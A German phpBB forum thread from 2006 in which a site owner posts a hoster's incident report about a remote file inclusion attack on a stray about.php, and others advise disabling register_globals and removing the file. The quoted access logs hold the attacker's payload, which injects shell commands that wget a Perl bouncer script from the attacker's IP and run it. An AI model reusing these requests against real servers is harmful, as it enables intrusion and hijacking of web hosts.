Seite 1 von 1
Angriff auf about.php !
Verfasst: 21.07.2006 06:42
von qix100
Hallo,
ich habe Heute von meine Provider folgenden Mail erhalten:
allem Anschein nach ist es Dritten gelungen, Ihre Webanwendung aufgrund
einer Sicherheitslücke für andere Zwecke zu missbrauchen.
Dateien:
/tmp/atrix_bnc.pl
/tmp/logs/
/tmp/yuha.pid
/tmp/users.db
Skript mit Sicherheitslücke:
./meinserver/phpBB2/about.php
Zugriffe:
---
201.4.233.137 - - [20/Jul/2006:21:32:33 +0200] "GET
/phpBB2/about.php?ws=
http://www.mirai.mg.gov.br/dados/.uNfz/.xpl0itz/too
l25.dot?&cmd=cd%20/tmp;%20wget%20201.4.233.137/atrix_bnc.pl;%20ls
HTTP/1.1" 200 23895
www.meinserver.de "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; SV1)" "-"
201.4.233.137 - - [20/Jul/2006:21:33:06 +0200] "GET
/phpBB2/about.php?ws=
http://www.mirai.mg.gov.br/dados/.uNfz/.xpl0itz/too
l25.dot?&cmd=cd%20/tmp;perl%20atrix_bnc.pl%202525%20258456258456
HTTP/1.1" 200 23843
www.meinserver.de "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; SV1)" "-"
201.4.233.137 - - [20/Jul/2006:21:33:33 +0200] "GET
/phpBB2/about.php?ws=
http://www.mirai.mg.gov.br/dados/.uNfz/.xpl0itz/too
l25.dot?&cmd=cd%20/tmp;perl%20atrix_bnc.pl%202525%20258456258456
HTTP/1.1" 200 0
www.meinserver.de "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1)" "-"
201.4.233.137 - - [20/Jul/2006:21:39:11 +0200] "GET
/phpBB2/about.php?ws=
http://www.mirai.mg.gov.br/dados/.uNfz/.xpl0itz/too
l25.dot?&cmd=cd%20/tmp;perl%20atrix_bnc.pl%202525%20258456258456
HTTP/1.1" 200 24068
www.meinserver.de "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; SV1)" "-"
---
Ich habe die aktuelle Version 2.0.21 installiert !?!
Gibts das wieder eine Sicherheitslücke ??
Gruß,
QIX100
Verfasst: 21.07.2006 07:19
von larsneo
afaik hat das aktuelle phpbb2 keine about.php im root - da sie aber bei dir vorhanden ist und sicherheitslücken (remote code injection) aufweist - was steht denn da bei dir drin?
OT: /me fragt sich mal wieder, warum es heutzutage immer noch provider gibt, die per default register_globals=on setzen* - aus sicherheitsgründen wurde diese einstellung bereits im April 2002(!) in der PHP version 4.2.0 standardmäßig ausgestellt, in PHP 6 wird register_globals dann endgültig abgeschafft, thx god...
das darüberhinaus das tmp-verzeichnis die ausführung von perl-skripten ermöglicht ist sicherlich auch nicht wirklich gut durchdacht
* nachdem dein provider ja scheinbar gottvertrauen hat, solltest wenigstens du für deinen bereich die sicherheit ein wenig ernster nehmen und register_globals=off setzen, in aller regel hilft schon eine kleine .htaccess im root der präsenz:
Code: Alles auswählen
# set register_globals=off
php_flag register_globals off
kontrollieren kannst du die einstellung danach via phpinfo.php
Verfasst: 21.07.2006 16:33
von qix100
Hallo larsneo,
vielen Dank für deine Antwort.
Hmmm ... ich habe immer einfach die neuen Updates gemacht ... da stand aber nie was von Dateien löschen
Kann ich die about.php einfach löschen ??
Leider kann ich mit den Codeschnipseln nix anfangen, da ich mich damit nicht auskenne
Übrigens ist mein Provider "Schlund & Partner" !!
Hmmm, im Root steht auch noch eine upgrade.php , kann die auch weg ??
Gruß,
Frank
Verfasst: 21.07.2006 16:38
von larsneo
1. was steht denn in der about.php drin (gerne auch via PM bzw. mail an larsneo AT postnuke DOT com)
2. die upgrade.php kannst/solltest du löschen (wenn überhaupt würde die eh' in den /install ordner gehören)
Verfasst: 21.07.2006 16:44
von qix100
Mail ist unterwegs !!
Verfasst: 21.07.2006 17:34
von tomtom
larsneo hat geschrieben:
* nachdem dein provider ja scheinbar gottvertrauen hat, solltest wenigstens du für deinen bereich die sicherheit ein wenig ernster nehmen und register_globals=off setzen, in aller regel hilft schon eine kleine .htaccess im root der präsenz:
Code: Alles auswählen
# set register_globals=off
php_flag register_globals off
kontrollieren kannst du die einstellung danach via phpinfo.php
Hi,
wenn ich eine .htaccess mit dem o.g. Inhalt in den Root lege, geht gar nix mehr:
ERROR 403: Zugriff verweigert
Es ist ein Fehler aufgetreten:
Der Zugriff auf die von Ihnen aufgerufenene URL wurde verweigert!
Verfasst: 21.07.2006 17:43
von larsneo
falls die phpinfo.php anzeigt, dass register_globals bei dir aktiv ist, frage deinen provider wie du es (im hinblick auf deutlich bessere sicherheit) zumindestens für deinen bereich deaktivieren kannst.
Verfasst: 21.07.2006 18:36
von tomtom
larsneo hat geschrieben:falls die phpinfo.php anzeigt, dass register_globals bei dir aktiv ist, frage deinen provider wie du es (im hinblick auf deutlich bessere
sicherheit) zumindestens für deinen bereich deaktivieren kannst.
Schon passier, nach Aussages des Supports nicht möglich. Stattdessen rät man mit zu einer
php.ini im Root mit dem Inhalt
Wie kann ich denn überprüfen, ob dieser Trick auch greift?
Verfasst: 21.07.2006 19:20
von larsneo
natürlich mit der o.a. phpinfo.php - wobei sicherlich von interesse ist, ob das php.ini setting genauso wie die .htaccess geschichte rekursiv für die unterordner gilt - am besten auch in einem unterverzeichnis mittels phpinfo.php testen
Verfasst: 23.07.2006 10:50
von h-o
larsneo hat geschrieben:wobei sicherlich von interesse ist, ob das php.ini setting genauso wie die .htaccess geschichte rekursiv für die unterordner gilt
Bei der php.ini gibt's normalerweise keine "Vererbung" für Unterordner, aber das ist bei Dateien, die beispielsweise im includes-Verzeichnis liegen, auch nicht erforderlich, da in diesem Fall die php.ini-Einstellung der aufrufenden Datei im Stammverzeichnis gilt (z. B. viewtopic.php).
Eine andere Geschichte ist es natürlich, wenn jemand die Dateien in /includes zum Cracken des Forums direkt aufruft. Aber die User hier sind ja alle sehr wachsam und haben dort bestimmt "if ( !defined('IN_PHPBB') )..." und dazu noch eine "Deny from All"-.htaccess eingebaut
